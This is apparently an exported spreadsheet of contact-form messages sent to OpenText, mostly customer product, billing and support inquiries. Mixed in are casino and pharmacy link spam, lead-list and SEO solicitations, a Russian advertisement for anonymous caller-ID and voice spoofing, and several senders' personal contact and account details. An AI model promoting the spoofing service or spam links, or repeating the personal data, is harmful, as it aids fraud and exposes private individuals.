    <t>I am trying to access the ERP Portal Career Referral link to refer a friend for the position of Sr Technical Writer in Waterloo ON but it is not working.  She has already applied but I was hoping to be able to send it as a referral.  Her name is Jennifer Zwaniga.</t>
  </si>
  <si>
    <t>Im looking for some product advice before purchasing</t>
  </si>
  <si>
    <t>I'm interested in receiving more info on Extended ECM for SAP SuccessFactors._x000D_
I have read the Solution Brief by SAP and it describes exactly what we are looking for._x000D_
_x000D_
If possible I would like to get a demo and get an insight on the costs (licenses and implementation)</t>
  </si>
  <si>
    <t>Interested in Purchasing ProVision Enterprise License.   Note that company is based in Dallas, TX.   I am a work from home business process consultant in Albion, Michigan.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I requested your support on downloading Gupta 6.3 TD patches last week, but we received no reply since then. Please could you help us?_x000D_
_x000D_
Kind Regards,_x000D_
Alessandro Mulas</t>
  </si>
  <si>
    <t xml:space="preserve">Billing REQUEST - missing invoices for the January and February 2018. </t>
  </si>
  <si>
    <t>Would like to kick start the 2nd phase of the project but our contact Mr. Ben Leung seems not available so would like to know who I could contact for help?</t>
  </si>
  <si>
    <t>Would like to organise a demo of your eDocs DM system.  We are a firm of patent attorneys.  Key parts are document management and email saving.</t>
  </si>
  <si>
    <t>I wanted to find out if there is any training that is going on or will be commencing in the near future._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
sie erstellen und versenden für uns Faxe und wir benötigen eine Änderung des Logos auf diesen Faxen. Unsere account_no ist 269230, die user-id GRXQDBTRDIN und der Remote Name für die Testanlage ist GRTSTDBTRD1. Bitte teilen Sie mir eine Kontaktperson mit, mit der ich die Änderungen und den Zeitplan absprechen kann. Für Ihre Mühe vorab vielen Dank. Mit freundlichen Grüßen_x000D_
Jörg Lennartz</t>
  </si>
  <si>
    <t xml:space="preserve">TX me when you get a chance to get a chance to get </t>
  </si>
  <si>
    <t>Technical query - cannot archive to SAP. Error message - Failed to initialise archiving elements. Check the configuration of archiving devices</t>
  </si>
  <si>
    <t>Looking for the Document mgmt System</t>
  </si>
  <si>
    <t>There's an issue on your download page when downloading ICC 7.5 SP6 (icc5[1].2 sp6.zip [522 MB]) -&gt; https://knowledge.opentext.com/knowledge/llisapi.dll/open/KCProduct?id=103</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Few days back I contacted you to review an Infographic-  http://bit.ly/2BrApH6  on  “How Online Retailers Can Reduce Shopping Cart Abandonment”. I was just wondering if you had an opportunity to review the same. I look forward to hearing from you in this regard._x000D_
 _x000D_
Have a nice day!_x000D_
Thanks,_x000D_
Simon Pleass_x000D_
</t>
  </si>
  <si>
    <t>Re: Website Issues..?_x000D_
_x000D_
Hi_x000D_
_x000D_
Hope your business is doing great this year._x000D_
 _x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
I was analyzing your site and it seems that some of your website rankings have dropped. It is due to non optimized techniques/errors And Google guidelines not being followed properly. _x000D_
 _x000D_
•	Your web page failed on 4 high priority checks: Meta Description, &lt;h1&gt; Headings Status, Broken Links Test, URL Canonicalization Test_x000D_
•	Your most common keywords are not appearing in one or more of the meta-tags above. Your primary keywords should appear in your Meta._x000D_
•	Site link diversity and Domain Authority is low_x000D_
•	URL Canonicalization should resolve to the same URL, but currently do not. _x000D_
•	5 of them are missing the required 'alt' attribute._x000D_
•	Your website should load quicker _x000D_
•	Your webpage has so many 'img' tags and 5 of them are missing the required 'alt' attribute. _x000D_
•   Your page has more than 20 http requests, which can slow down page loading._x000D_
 _x000D_
I would love the chance to help as well however; this report will at least give you a gauge on the quality of what I do.  If you are interested then please share your requirement and contact details._x000D_
Please let me know if we can discuss this._x000D_
_x000D_
Thanks_x000D_
John Smith_x000D_
johnseomarketing9@gmail.com</t>
  </si>
  <si>
    <t>Information zur  CAS System für den Archive Center 16.0. Ich benötige Informationen welche IBM CAS Systeme unterstützt werden. Laut Information ist das der DR550/DR550 Express. Werden neuer Systeme von IBM unterstützt?</t>
  </si>
  <si>
    <t xml:space="preserve">Wants to discuss and verified the previous emails i got._x000D_
hope to get kind reply._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are working with one Customer on SharePoint, they are using CAD and they wanted to manage the files from SharePoint centrally. i would like to understand how can Brava help us. this kind of urgency. Appreciate if your team Answer me at the earliest. Thanks.   </t>
  </si>
  <si>
    <t xml:space="preserve">Below is an error I receive when trying to access a report. (All details requested were provided) . If interested, contact me for more info._x000D_
The Information Provided is Incomplete or Invalid. _x000D_
 _x000D_
_x000D_
Industry - This field is required_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested on your DMS solutions, and looking forward for Partnership here in the Philippines. Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
My name is Victor Raposo, I’m the Co-Owner of a small family owned and operating landscape company called Cunha Landscape Construction or also known as CLC. _x000D_
I’m Emailing you today to check if you’re happy with the services that  you are getting from your current Property Maintenance Company? _x000D_
If the answer is no and are shopping around? We would be more then happy to give you pricing at your location on Trans canada trail, Waterloo. _x000D_
If you would like to know more about our services and if are interested in references from our current customers I can provide their information over to you. _x000D_
_x000D_
Best Regards, _x000D_
Victor Raposo_x000D_
Co-Owner/Estimator_x000D_
Cunha Landscape Construction_x000D_
C 226 750 5227_x000D_
</t>
  </si>
  <si>
    <t>I have tried to download BRAVA with no success.</t>
  </si>
  <si>
    <t>Wanting a fax solution for our EMR (GE Centricity) that requires the least amount of clicks</t>
  </si>
  <si>
    <t>Existing customer on legacy version of Case360, looking at redevelopment of Case Management solution; interested current OpenText offerings &amp; capability.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Alice, would you be interested in purchasing our updated and permission based Sourcing and Procurement Industry Decision Makers Email List across USA, Canada  &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	CPO/SVP/VP/Director/CEO_x000D_
•	Procurement Manager/Director_x000D_
•	E-Procurement Manager/Director_x000D_
•	Purchasing/Sourcing Manager/Director_x000D_
•	Supply Chain Management Director_x000D_
•	Strategy &amp; Innovation Manager_x000D_
•	Operation Manager/Director_x000D_
•	Safety and Risk Manager/Director_x000D_
•	Facility Manager/Director_x000D_
•	R&amp;D Manager/Director_x000D_
•	Product Manager/Director_x000D_
•	Project Manager/Director_x000D_
•	Service and Maintenance Manager_x000D_
•	Logistics Manager/Director_x000D_
•	Other Key-Decision Makers_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Our aim would not just be providing lists but educate you on what really works for your market from our experience and our approach are sure to prove to be valuable asset._x000D_
_x000D_
We update our lists every 60 days and also ensure final quality check before delivering the list._x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Alice Wilson_x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: alice.wl@chief-exhibitus.com_x000D_
Web: www.chief-exhibitus.com_x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Opt Out".</t>
  </si>
  <si>
    <t>Create an account for Sears</t>
  </si>
  <si>
    <t>I am working on an article about the Hightail acquisition. Can you please send me an image for media use? A picture of your headquarters or something along those lines would be helpful. Thanks!</t>
  </si>
  <si>
    <t>REMOVE US FROM YOUR FAX/PHONE CONTACT. 2ND REQUEST.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am writing this email to check if you would be interested in acquiring a verified list of QlikView users/customers for your sales and marketing initiatives? We can customize the list based on your requirement and can connect you with following application users: MapR users, Tableau users, SAS users, Birst users, Pentaho users, Alteryx  users and any other users of your choice._x000D_
_x000D_
Information field: Name, Email, Phone, Title, Country, State, City, Revenue, Employee size, Industry, FAX, SIC code, Web address etc._x000D_
_x000D_
Regards,_x000D_
David Lennon_x000D_
Lead Generation Team_x000D_
</t>
  </si>
  <si>
    <t>Some of our users are upgrading to Windows 10.  Wanted to enquire if our version of Bi-Query is compatible with Window 10 operating system.  Our users currently use Windows 7._x000D_
_x000D_
We currently have version:  Open Text Bi-Query 10.1.2.1241_x000D_
_x000D_
Thanks,_x000D_
Marilyn</t>
  </si>
  <si>
    <t xml:space="preserve">The Corporate Legal Operations Consortium will hold the 3rd annual Institute in Las Vegas in April 2018. Who would I talk with to engage OpenText in a sponsorship opportunity? _x000D_
_x000D_
In May of last year, nearly 1,000 experts in legal operations and the corporate legal services industry converged on Las Vegas for the 3rd annual CLOC Institute in the U.S. This year, based on historical growth of this event and of CLOC’s membership growth, it is anticipated that the Institute will host 2,000+ attendees. And, we're anticipating that approximately 50% of the attendees will have legal operations titles. </t>
  </si>
  <si>
    <t>Hi, we request for your fax service, we dear request for more details about this service be kind to reach us with contact detail stated below._x000D_
_x000D_
Andrew Schultz (Head sales Team)_x000D_
Farmland Fresh Dairies_x000D_
T: (973) 755-0929 _x000D_
F: (973) 425-5209_x000D_
802-814 Bergen Street, _x000D_
Newark, New Jersey 07108_x000D_
www.farmlandmilk.com</t>
  </si>
  <si>
    <t>just reviewing viewers only for now.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to engage a TAM from OpenText to do a Baseline Health Check and work with us to upgrade our existing RightFax environment.  Project has been approved and is now in the planning stages.   </t>
  </si>
  <si>
    <t>Inquiring about how a macOS user would utilize Exceed on Demand. Is that software available for installation on macOS, or would they need to use the Exceed Turbo X web based solution. Any information you could provide would be helpful. Email is best point of contact. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">HI,_x000D_
We are looking to automate our build and deployment process for our project and are not able to find an automatic way of building the.Pub file that is created out of the HP Exstream database. the process that we follow as of now involves developers to provide the pub file and us version controlling it after that, but we want to know if there is any process to do the build using automation so that the dependency on the developers can be minimized. </t>
  </si>
  <si>
    <t>We are not able to share the session cookie in between eRoom website and the plugin. Naveen Dhawan is our India architect who needs assistance.  Please let me know if there is any cost associated with this request.</t>
  </si>
  <si>
    <t>I have completed the online form to request a link to "One year in: A webinar dedicated to all things Documentum", recorded Wednesday, February 14, 2018. For some reason I am not being sent the email. I have tried several times, but no luck. Can you please email me a link (clarsen@enchoice.com) to the webinar? Thanks.</t>
  </si>
  <si>
    <t>need instruction manualforgps 1980s</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
The birt demo site is down :_x000D_
http://demo.actuate.com/demos/EclipseDemo/EclipseDemo.html_x000D_
Could you tell me what is the problem?_x000D_
_x000D_
Best regards,_x000D_
David Clesse</t>
  </si>
  <si>
    <t>I am interested in seeing a demo for the Content Server suite.  Currently we are an eDocs customer, and I'd like to see how Content Server works, what the user experience is like, what the records management component is like, etc.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need the password reset on our account.  when i click reset the email is sent to address we are not using. _x000D_
_x000D_
Company: stephanie Johnson owned by ricardo beverly hills_x000D_
_x000D_
Thank you,_x000D_
Ryan</t>
  </si>
  <si>
    <t xml:space="preserve">need to be contacted AGAIN for RIGHT FAX. I was contacted by a Lady on the phone, she promised to send a quote but the quote never arrived.  Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">I want to find out how i can open tickets for service requests. </t>
  </si>
  <si>
    <t>Currently, I support 40 PCs that replaced old Digital Equipment Corporation (DEC) VXT 2000+ graphics terminals for our OpenVMS system.  We are currently using OpenText Exceed Version v15.0.0.185 on Windows 7 platform.  Our plant has published our outage schedule for the next year, which we do maintenance on this computers.  _x000D_
_x000D_
1. What is the estimated release data for v16?  _x000D_
2. What is the estimated release data for a version (64-bit) for Windows 10 support?_x000D_
3. Is there a better method for Mansfield Automation group, who pays for the software and fees, a plant in the AK Steel Corporation, to purchasing support for 40+ PC using OpenTEXT.  Most if not all are terminals used by Operators in production that only use the package to connection to our OpenVMS application.  _x000D_
_x000D_
I have been asked for my budget and plan for maintenance and support of these terminals replacements.  _x000D_
_x000D_
I greatly appreciate your support.</t>
  </si>
  <si>
    <t>Licenses for Citrix servers</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a digital catalog software and are interested in a demo of Active Catalog.   </t>
  </si>
  <si>
    <t>SAP Connector License inquiry for RightFax 10.5</t>
  </si>
  <si>
    <t>Bonjour, je n'ai pas reçu la facture du mois de décembre._x000D_
Merci de me la renvoyer svp._x000D_
client : 84852_x000D_
ENBATA FRUITS_x000D_
M SOUN_x000D_
ZI DES JONCAUX_x000D_
64700 HENDAYE _x000D_
FRANCE_x000D_
_x000D_
Merci d'avance._x000D_
_x000D_
Cordialement.</t>
  </si>
  <si>
    <t>Dear LearnFlex Team,_x000D_
_x000D_
I am Davide Conforti, co-founder &amp; CEO at OfCourseMe (https://www.of-course.me/), an online learning recommendation engine aggregating and organizing over 50 thousand courses in our catalogue (content provided by quality platforms like Coursera, edX, Udacity, Udemy, Lynda, Pluralsight, etc.)._x000D_
_x000D_
We are aware, as you are, of the recent trend in corporate learning to leverage the value of third party learning objects to enrich career development paths for employees, and we think major LMS vendors are asked by their customers to integrate their suite with a wide and high quality catalogue._x000D_
_x000D_
This is what OfCourseMe offers! We can easily provide "white label" APIs and even a version of our meta search engine for LearnFlex to integrate and expose to your customers. _x000D_
_x000D_
Why partnering with us?_x000D_
1. Already 50+ thousand online courses, 2x expected in 12 months_x000D_
2. All contents from different sources already organized in a proprietary classification_x000D_
3. Meta search-engine making search &amp; comparison of learning objects immediate_x000D_
_x000D_
We would be thrilled to arrange a quick call to discuss the above opportunity with you. How about next week?_x000D_
_x000D_
Best regards, Davide</t>
  </si>
  <si>
    <t>post@ahd.com.ua</t>
  </si>
  <si>
    <t>[url=http://hydratech.ru/category/pogruzhnye-shlamovye-nasosy][img]https://s8.hostingkartinok.com/uploads/images/2018/02/caf63d92e25b2379557aa726db3008bf.jpg[/img][/url] _x000D_
 _x000D_
ГидравлическаястанцияHydra-teсh13G &lt;br&gt;&lt;u&gt;КамнерезнаяпилаHusqvarna TS300E 9651546-01  &lt;/u&gt;&lt;br&gt;&lt;h2&gt;Дизельный генераторYanmarкупить в РОССИИ у 43 поставщиков ...  &lt;/h2&gt;&lt;br&gt;Услугиотбойногомолоткав России. Услуги на    Услугиотбойногомолотка. Продажа, поиск, поставщикиимагазины, цены в России. Ремонт, монтаж, изготовлениеиналадка промышленного оборудования 1.    &lt;br&gt;Высоконапорныецентробежныенасосы   Горизонтальные многоступенчатые центробежныенасосыWilo-Economy MHIL. Применение: Системы водоснабжения и повышения давления. Применение в промышленности.    &lt;br&gt;Демонтажные Работы Разборка Стен, Потолок,    РучнойДемонтажв квартире, доме и офисе по лучшим ценам в Екатеринбурге. Демонтируем быстро и аккуратно.   &lt;br&gt;Запчастидлябензогенераторов- купить по лучшей цене на    С помощью нашей площадкиЗапчастидлябензогенератороввы сможете узнать стоимость, уточнить условия сотрудничества, посмотреть список     &lt;br&gt;&lt;i&gt;Daum ???  &lt;/i&gt;&lt;br&gt;Ремонтбензогенератора своими руками (видео)   Возможен ли самостоятельныйремонтбензогенератора? Самостоятельно провести можноремонттолько тех установок, которые оснащаются механической системой запуска.    &lt;br&gt; [url=http://hydratech.ru/category/motopompy]грязевая мотопомпа[/url],  256-63232 помпа &lt;strong&gt;Демонтажстяжкицена за м2. Роботами Brokk, ручной.  &lt;/strong&gt;&lt;br&gt;Главный операционный директор компании Lamor Руне Хёгстрем, который прибыл вцентр Ohmsett для руководства испытаниями оборудования Lamor, .... Scout компании Clean Seas являются специализированными судами для ликвидации аварийных разливов нефти (ЛАРН), в условиях открытого  станция EP Технофорс&lt;/strong&gt;&lt;br&gt;&lt;h4&gt;Арендапил в Новосибирске  &lt;/h4&gt;&lt;br&gt;</t>
  </si>
  <si>
    <t>Put wrong email address on order for software._x000D_
Invoice: 184495_x000D_
Correct one is mgooch@racetech.co.uk. can you please resend confirmation of order and download link for software to correct one._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>I need some support or need to see the content update for any issues &amp; resolutions related to Documentum, D2 and Captiva. Whenever I access it is showing permission denied at this point. It is crucial for me to have a access as part of the application support.</t>
  </si>
  <si>
    <t>I'd like to contact a partner located in Egypt. _x000D_
Thank you</t>
  </si>
  <si>
    <t>To become solution partner for OpenText</t>
  </si>
  <si>
    <t>Dear Hiring Manager,_x000D_
_x000D_
I am a Service Engineer with work experience of over three years in sales and service in printing and information technology industries._x000D_
_x000D_
After earning my Diploma in Mechanical Engineering from Sri Ramakrishna Polytechnic College in Coimbatore, India, I worked as a Service Engineer at Gowri Xerox Center and PCS India Private Limited, and now hold the same position at Magnum Web Technologies._x000D_
_x000D_
My work experience has helped me acquire the skills and expertise necessary to provide timely support to customers in the form of installation, maintenance and troubleshooting of different kinds of photocopiers, all-in-one printers, fax machines and computer equipment such as printers and scanners. In addition to these, I possess good selling skills to be able to promote products and services to customers to generate and maximize revenue._x000D_
_x000D_
With my strong technical and customer-facing skills, I believe that I can make significant contributions to the company._x000D_
_x000D_
My résumé is enclosed for your consideration. Should you have any questions or wish to schedule an interview, please do reach me at +91 8300 557 175. I look forward to hearing from you soon._x000D_
_x000D_
Thank you for your time and consideration._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ramesh Aravind B</t>
  </si>
  <si>
    <t>REDACT.UK_x000D_
_x000D_
Would you like to buy our domain name REDACT.UK that's currently on sale for £1995?</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
I would like to check why I can't access to my account and I need to download the software to transfer my license to another computer. Please kindly assist on this as I have no idea why so hard just to transfer the license which been purchased. I need an explanation of assist to transfer the software without any support service which need to be paid or whatsoever. As I think we have the right to transfer the software anytime as we've already purchased the license. I think the license should be able to transfer without any special service from support team or whatsoever that need to be paid. I don't think with the purchased license still need to paid to transfer the software? _x000D_
_x000D_
Hope to hear from you soon as I need to transfer the license urgently.</t>
  </si>
  <si>
    <t>To discuss the document management solution that you may help to provide for our company. It's related to IT auditing process. Looking forward to hear from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am Raj, and I work as a Business Development Manager at Ryan Software, we are a Web Development company based in India. _x000D_
_x000D_
We have a large team for Web &amp; Mobile apps Development, SEO and Design with proven track records catering with our services for businesses of all sizes._x000D_
_x000D_
We would be glad to collaborate with you on web &amp; Mobile apps design and development projects._x000D_
_x000D_
For limited time we are offering dedicated developers for 1300 EUR/month for WordPress, Drupal, CodeIgniter, CorePHP, Laravel, Angular, ASP.net, iOS, and Android, you can hire best developers from Skynet Technologies with life time bug fixing warranty for our code. _x000D_
_x000D_
For project management we are using Basecamp, Trello, Asana, MockFlow and if required by you we can use any other 3rd party applications._x000D_
_x000D_
Please check our portfolio for your reference, here is the portfolio link: _x000D_
http://ryansoftwares.com/portfolio.html_x000D_
_x000D_
Looking forward for your response._x000D_
_x000D_
Regards,_x000D_
Raj_x000D_
</t>
  </si>
  <si>
    <t>To whom it may concerns_x000D_
We've been quit using your service more than a year because no M&amp;S order _x000D_
This year we have received 2 orders from M&amp;S._x000D_
_x000D_
Is these any way to reactive our account? and what option do we have instead of 1 year period?  Since the order just come and gone. _x000D_
_x000D_
Best regards_x000D_
Pracha K.</t>
  </si>
  <si>
    <t>Hi, I'm interested in Documentum and Brava Desktop for our construction projects in the Philippines.</t>
  </si>
  <si>
    <t>Hello, I would like to ask you to delete my career profile and attached documents on the Career portal. Thank you. Best regards, Edit Szabó (user: edit197szabo@gmail.com)</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Is there an evaluation version of the rightfax product to integrate into a Cisco Call Manager system. I am looking to deploy the product in a lab to perform system tests to verify the product is fit for purpose. If so it can be approved to be deployed within our organisation._x000D_
_x000D_
Thanks_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t>http://socialmediapostingbiz.com/ We make your Posts for you. interesting, cool and funny pictures and articles about your custom business Posted to your Facebook Page, Instagram, Pintrest and Twitter Pages for you. We can help you respond to your visitors and grow more too. http://socialmediapostingbiz.com/    _x000D_
Phone: 5165140445</t>
  </si>
  <si>
    <t>Hi, I am wondering if you mind me posting this article on my website blog at Qtility.com?_x000D_
_x000D_
Mike Clarke_x000D_
403-701-3763 m</t>
  </si>
  <si>
    <t>Добрый день! _x000D_
Предлагаем рассмотреть наше встречное предложение: _x000D_
 _x000D_
Отправка вашего сообщения в более чем 600 000 форм обратной связи Россия только до 28 февраля - 3000р _x000D_
Ваше сообщение увидят более 600 000 администраторов сайтов и те кто имеет к ним доступ! _x000D_
Вы прорекламируете Ваши товары и услуги! _x000D_
 _x000D_
Заявки и вопросы писать только сюда: 2018form @bk.ru(убрать пробелы)</t>
  </si>
  <si>
    <t>I have lost the contact to your (my contact person Corinna Gerts: cgertz@opentext.com) my login to Globalview.adp does not work._x000D_
Please forward this message to your (our) payroll-CentralEurope!</t>
  </si>
  <si>
    <t>kindly provide me of your authorized distributors in my country: Riyadh, Saudi arabia</t>
  </si>
  <si>
    <t>Unable to login into my account.</t>
  </si>
  <si>
    <t>when install free bravia reader it ask what program to use to open it? What program do I use?</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://casinoline17.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;play casinos&lt;/a&gt; _x000D_
free online casino</t>
  </si>
  <si>
    <t>Вы сможете звонить абсолютно с любого номера, друга, жены или +77777777777 _x000D_
 _x000D_
Предлагаю абсолютно анонимный сервис для звонков со всего мира и по всему миру. _x000D_
Наши плюсы: _x000D_
1) Неограниченая бесплатная подмена номера, хоть 1000 раз в день _x000D_
2) Подмена голоса 6 режимов _x000D_
3) Абсолютная анонимность, невозможность прослушки и определения местонахождения звонящего. _x000D_
4) Детализация звонков выдает тот номер, который вы использовали для подмены. _x000D_
5) Возможность работать через приложение или через специальную сим карту, которую мы вам доставим. _x000D_
6) Наша сим карта работает по всему миру без роуминга _x000D_
7) Тарифы на звонки по всему миру от 2 до 20 рублей за минуту _x000D_
8) Работает на всех платформах и телефонах (Windows, Linux, android, iphone, простая звонилка типа nokia 1100) _x000D_
На любой компьютерной ос или смартфоне/планшете можно настроить наш сервис через приложение. _x000D_
На любом аппарате, где есть слот под sim карту можно пользоваться сервисом с помощью нее. _x000D_
 _x000D_
Цены: Настройка, установка, подключение - 5000 руб _x000D_
Сим карта - 3000 руб + доставка _x000D_
Звонки 2-20 руб/мин _x000D_
Пополнение счета - 5-10% от суммы, зависит от метода пополнения _x000D_
 _x000D_
Пройдем любые проверки, сделаем Вам тестовые звонки. Согласны на оплату через гаранта любого авторитетного форума. _x000D_
 _x000D_
Контакты: _x000D_
Viber    - +7 988 320 89 22 _x000D_
Whatsapp - +7 988 320 89 22 _x000D_
Почта    - vipsecurecall@gmail.com _x000D_
Телеграм - @Vip_Security _x000D_
Icq      - 723882584 _x000D_
Время работы: 10:00-23:00 по МСК</t>
  </si>
  <si>
    <t>Для строительства домов застройщиком выбрана надежная кирпично-монолитная технология. [url=https://xn--80aieocueqr8g.xn--p1ai]купить 1 комн квартиру в мытищах[/url] чучмарева, дидро многое сделал по изучению русского языка и литературы и вывез из россии целую библиотеку русских книг. [url=https://xn--80aieocueqr8g.xn--p1ai]купить квартиру в мытищах жк отрадное[/url]</t>
  </si>
  <si>
    <t>We need to create operations documentation and I need to know our account number and how our support team can submit tickets without going through me, the project manager. Can you assist me? Thanks!</t>
  </si>
  <si>
    <t>dear OpenText. Back in the mid 90's, public FirstClass servers were a pretty common thing, and they were a lot of fun. Myself and some other people from some of the Vintage Macintosh forums on Facebook would like to run a Public FirstClass Server based on something like Version 5 or 6. I have only ever been able to find a copy of FirstClass Server 2.4 for sale, and it will not accept IP connections. I was wondering, is there any way that you would still be able to generate a License File for a version that old, and work out some sort of fair price for someone to just run a public, free BBS with it?_x000D_
_x000D_
Thanks,_x000D_
Blake.</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinoline17.com/]casino online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">   MARGARITTA  Guillaume_x000D_
_x000D_
         02 rue Fortier_x000D_
_x000D_
        60230  Chambly_x000D_
_x000D_
        06 04 16 74 12 _x000D_
_x000D_
        Chihiro_2@hotmail.FR                             _x000D_
_x000D_
_x000D_
_x000D_
                                                                           Paris, le 8 Février 2018_x000D_
_x000D_
_x000D_
                                        Objet : Demande d'un rendez-vous_x000D_
_x000D_
_x000D_
_x000D_
                    Madame, Monsieur,_x000D_
_x000D_
_x000D_
   Je me présente Guillaume Margaritta écrivain reconnu et encyclopédiste, auteur d'une belle œuvre intemporelle et historique, comportant 525 pages sur les traces des philosophes des lumières... _x000D_
_x000D_
Je vous propose de me rencontrer lors d'un Rendez-vous détaillé sur la formidable dimension économique de notre futur partenariat ! Je vous expliquerai alors toute la dextérité et la puissance de nos actions à venir. Ma proposition porte sur les 39 domaines de compétences qui sont les miens, notamment la finance, le management, le choix binaire... Sans oublier l’ingénierie, les sciences et l’étude de l'analyse d'un marché en pleine expansion. _x000D_
_x000D_
Cette collaboration sera très cruciale pour partir à la conquête des éléments financiers qui feront la pleine réussite d'une société... Cette universalité de l'écriture est votre meilleur atout et sera la hausse de votre chiffre d'affaires... Une expertise presque unique dans le monde francophone !_x000D_
_x000D_
_x000D_
                     Veuillez agréer, Madame, Monsieur mes salutations distinguées</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casinoline17.com/]biggest no deposit welcome bonus[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
play casinos</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for enterprise fax replacement solution </t>
  </si>
  <si>
    <t xml:space="preserve">Could you please tell me the price of ticket? _x000D_
Thanks! </t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;real money casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://casinoline17.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino online free</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Testing this for a campaign, please disregard. Thank you!</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;real money casino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>generic celebrex _x000D_
[url=http://hqflagyl2017.com/]flagyl[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl antibiotic&lt;/a&gt; _x000D_
finasteride 5mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren&lt;/a&gt; _x000D_
finasteride</t>
  </si>
  <si>
    <t>Request my support account for this email account. Please kindly contact me if anything required to get access to my support as OpenText's business partner</t>
  </si>
  <si>
    <t>Добрый день! _x000D_
Предлагаем рассмотреть наше встречное предложение: _x000D_
 _x000D_
Отправка вашего сообщения в более чем 600 000 форм обратной связи Россия только до 25 февраля - 3000р _x000D_
Ваше сообщение увидят более 600 000 администраторов сайтов и те кто имеет к ним доступ! _x000D_
Вы прорекламируете Ваши товары и услуги! _x000D_
 _x000D_
Заявки и вопросы писать только сюда: 2018form @bk.ru(убрать пробелы)</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://enewz.ru/news/25855-zachem-rossii-voyna-v-sirii-i-kak-izmenilsya-mir-posle-udarov-vks-rf.html [b] Зачем России война в Сирии и как изменился мир после ударов ВКС РФ [/b] _x000D_
[url=http://enewz.ru/information-technology-it/20350-yandeksnavigator-predupredit-narushivshego-skorost-voditelya.html] «Яндекс.Навигатор» предупредит нарушившего скорость водителя [/url] _x000D_
http://enewz.ru/news/26268-druzhba-pod-procenty-ssha-ne-budut-okazyvat-bezvozmezdnuyu-voennuyu-pomosch-ukraine.html _x000D_
Ещё тут много интересного: [b] фонд помощи новороссии глеба корнилова [/b] [url="http://enewz.ru/"]http://enewz.ru/[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I like to get my inspiration from really meaningful phrases said by truly great people like вЂњThere is only one good, knowledge, and one evil, ignoranceвЂќ, do you know where I can find thematic compiltaions of those?_x000D_
 _x000D_
http://www.blackplanet.com/your_page/blog/view_posting.html?pid=9510177&amp;profile_id=104995316&amp;profile_name=anessay34&amp;user_id=104995316&amp;username=anessay34_x000D_
</t>
  </si>
  <si>
    <t>Any thoughts on my previous request?  Thanks.</t>
  </si>
  <si>
    <t>Searching for jobs</t>
  </si>
  <si>
    <t>I want this taken out of my head immediately and remember it happening with out my memory being scrubbed</t>
  </si>
  <si>
    <t xml:space="preserve">Asking for job </t>
  </si>
  <si>
    <t xml:space="preserve">I've attempted to gain access to a knowledgebase article provided to me by our Infor support rep. After creating an account it appears I'm stuck at the account confirmation stage. I've resent the account confirmation email 3 times and it's still not activated. _x000D_
</t>
  </si>
  <si>
